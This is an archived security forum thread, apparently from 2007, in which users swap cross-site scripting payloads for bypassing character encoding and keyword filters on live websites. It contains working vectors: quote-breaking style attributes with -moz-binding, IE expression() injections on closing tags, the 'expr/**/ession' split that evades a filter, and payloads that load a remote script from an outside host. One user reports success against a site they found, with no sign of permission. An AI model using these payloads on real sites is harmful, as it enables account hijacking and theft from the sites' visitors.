I've noticed on some applications I've come across that the site encodes certain characters to prevent xss attacks, so I'm curious if anyone is familar with any vectors that bypass these prevention techniques.

1) when entering a value such as ("><script>alert(xss);</script>) to escape outside the value attribute of a textbox, the site is encoding the double quote, so the html source result becomes.

<input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

2) Another prevention technique I've seen is the encoding of the < sign, so that when a script tag is entered it becomes.

&lt;script>alert(xss);&lt/script>

anyone come across bypassing these types of prevention techniques?

I've been wondering myself as I tend to run in to places that filter all non-alphanumeric characters into HTML equivalents, and completely strip any string containing "java", or "script".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Mephisto, there is no way you could escape 1).
Same for 2) but I'm not 100% sure. The human imagination is an amazing thing:P



Edited 1 time(s). Last edit at 03/02/2007 01:10AM by blad3.

Hi Mephisto,

> <input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

If the application has character encoding problem, you can use malformed US-ASCII or UTF-7 or something to bypass the filter.

US-ASCII: http://ha.ckers.org/blog/20060621/malformed-ascii-bypasses-filters/
UTF-7: http://sla.ckers.org/forum/read.php?3,3109

Otherwise, I think there is no way to bypass it.



Edited 1 time(s). Last edit at 03/02/2007 01:18AM by teracci.

Mephisto, 2) is pretty common and just as commonly they forget to escape the quotes. So if you are already inside a tag you can add the style attribute with -moz-binding (for Gecko browsers) and expression (for IE). E.g. you give the page /" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)/ you get:

<input name="text" value="" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)">

Often you also see that double quotes are escaped but the page actually uses single quotes for the attribute - which is just as vulnerable.

I was able to enter something like this to get it to work (" style="x:expression(alert(1))")

I've been testing various style properties, but haven't found one that would actually allow you to include a .js file or image that contains malicious code...anyone done this before? I've tried the "url" ones, behavior, etc...

style="background:url(javascript:document.body.appendChild(document.createElement('script')).src='http://hostname/foo.js')"

How is it?

Most excellent, thanks teracci!

And funny enough I just said the same thing on another post (it may also be vulnerable to variable width encoding): http://ha.ckers.org/blog/20060817/variable-width-encoding/

- RSnake
Gotta love it. http://ha.ckers.org

okay, found a site where I can put in "</span>" and anything else like that (</div>, </body>, </html>, etc...), but it won't allow the start tags (<span>, <div>, <body>, <html>, etc...) Anyone know of a way around this??

It appears to filter anything that is < and any Aa-Zz character after that.

Update: I can also put in stuff like "< body>", "document.location", "javascript", but it errors on "javascript:"



Edited 3 time(s). Last edit at 03/17/2007 05:39PM by Mephisto.

How about <<body>? If they use regexps they could easily make this mistake.

Edit: This is http://ha.ckers.org/xss.html#XSS_Extraneous%20open%20brackets btw.



Edited 1 time(s). Last edit at 03/17/2007 06:33PM by trev.

Mephisto Wrote:
-------------------------------------------------------
> okay, found a site where I can put in "" and
> anything else like that (, , , etc...), but it
> won't allow the start tags (, , , , etc...) Anyone
> know of a way around this??
>
> It appears to filter anything that is < and any
> Aa-Zz character after that.
>
> Update: I can also put in stuff like "< body>",
> "document.location", "javascript", but it errors
> on "javascript:"

Is it inside a tag from the beginning?

trev Wrote:
-------------------------------------------------------
> How about <<body> If they use regexps they could easily
> make this mistake.

But shouldn't it catch the <<body> part?



Edited 1 time(s). Last edit at 03/17/2007 06:32PM by hasse.

This seems to work in Firefox:

<\asdf style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)"> - sorry, doesn't really work.

@hasse: Because it might check "<<" and then continue with "bo".



Edited 1 time(s). Last edit at 03/17/2007 06:41PM by trev.

@trev - <<body> doesn't work either.

@hasse - The echoed input is placed within a <span></span> tag...

So it looks like this when echoed

<span>Input Here</span>

by inputing "</span>" I can close the span tag, but I can't seem to do much of anything useful with it, like inject another (starting) html tag.

I run a test and no browser allows you to put anything between < and the starting letter of the tag. So you cannot start a tag and without it this hole is harmless. That is, unless you manage to change the encoding of this page (see UTF-7 vector).

> It appears to filter anything that is < and any Aa-Zz character after that.

If so, try using NULL character.

<span><[0x00]script>alert()</script></span>

# IE completely ignores NULL chars.

@trev - the Accept-Charset header is "ISO-8859-1,utf-8;q=0.7,*;q=0.7", since it's defined as utf-8 I'm not sure I can set it to utf-7.

@teracci - the 0x00 null byte didn't work, it just rendered as part of the text. I tried the url encoded null byte version (%00) on another page and it actually caught it and threw an error.

It would appear I can't do much of anything with the type of filtering they have in place.

Mephisto, the important thing is not the Accept-Charset you are sending but Content-Type the server sends you. And sometimes it can be manipulated through URL parameters.

teracci, see above - I already tried the null byte and the other 65535 char codes as well. It might be that IE ignores it inside the tag name but it certainly doesn't want to have it between the opening bracket and the name.

How about style inside </a>?
</a style="xx:expression(alert('xss'))">

- Hong

IE accepts attributes on closing tags?????? That's crazy...

@trev - The content type is "text/html; charset=utf-8"

@Hong - It appears to filter "expression" as well.

Try http://ha.ckers.org/xss.html#XSS_DIV_background_image_unicode

It filters "expression" but does it filter expr/**/ession ?

- RSnake
Gotta love it. http://ha.ckers.org

@rsnake - you are my HERO! that worked perfectly.

Now the next task is to try and include a remote script.

I tried this, but it didn't work...

</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://mydomain/s.js')">

Find out which keyword it is blocking (probably "script") and use the same trick with /**/ again. Or write 'scr'+'ipt'.

You also have two double quotes there, might want to remove those, unless that was just a typo here.

- RSnake
Gotta love it. http://ha.ckers.org

Yep, I jumped the gun on it...just had to remove the additional double quote and it worked fine...thanks guys!

Rsnake, i tried that and it works. You r right Mephisto, u just hae to remove the additional double quotes.

http://hackathology.blogspot.com